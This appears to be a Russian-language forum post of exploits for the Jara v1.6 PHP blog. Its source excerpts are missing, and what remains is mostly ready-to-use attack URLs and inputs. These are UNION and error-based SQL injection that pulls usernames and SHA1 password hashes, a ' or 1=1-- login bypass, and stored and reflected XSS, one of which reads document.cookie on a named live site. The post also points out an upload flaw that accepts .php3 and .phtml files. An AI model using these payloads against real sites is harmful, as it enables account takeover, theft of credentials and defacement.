![]() |
Blog Jara v1.6
Jara v1.6 - 1st March 2010
http://jara.xantiz.com/download.html category.php PHP код:
mq=off http://localhost/jarav16/category.php?id=-1'+union+select+1,version(),3+--+ ---------------------- view.php PHP код:
Из-за капчи удобнее использовать FireFox + Tamper Data http://localhost/jarav16/view.php?id=1 заполняем Your Name: Your Comment: Security Question: и в Tamper Data правим id id=1','Guest','','Hi!<script>alert(121212);</script>',1270547738) -- 1 По адресу http://localhost/jarav16/view.php?id=1 имеем alert. ---------------------- page.php PHP код:
mq=off http://localhost/jarav16/page.php?id=1'+union+select+1,username,unhex(hex(p assword)),4+from+jara_users+--+ Хеш хранится в формате SHA1 ---------------------- В админке: admin/upload.php PHP код:
загружаются файлы с расширением .php3, .phtml ---------------------- |
Jara v1.6 - 1st March 2010
XSS /search.php PHP код:
PHP код:
Код HTML:
...<form action="search.php" method="post">в поле term - xss |
SQL inj - Класика жанра!
Входим в админку Jara v1.6 /login.php PHP код:
Эта конструкция отдыхает: PHP код:
/include/auth_fns.php PHP код:
mg=off Результат: <input type="text" id="username" name="username" width="20" /> в поле username ' or 1=1--[ ] |
SQL inj
Jara v1.6 /admin/delete_category.php PHP код:
/include/db_fns.php PHP код:
mg=off Результат: http://localhost/jarav/admin/delete_category.php?id=1[sql] http://localhost/jarav/admin/delete_category.php?id=1' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--+ Также уязвимы другие скрипты! |
http://xantiz.co.cc/blog/view.php?id=8%22%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E%3C%22 Если есть mq то можно и так
|
| Время: 17:37 |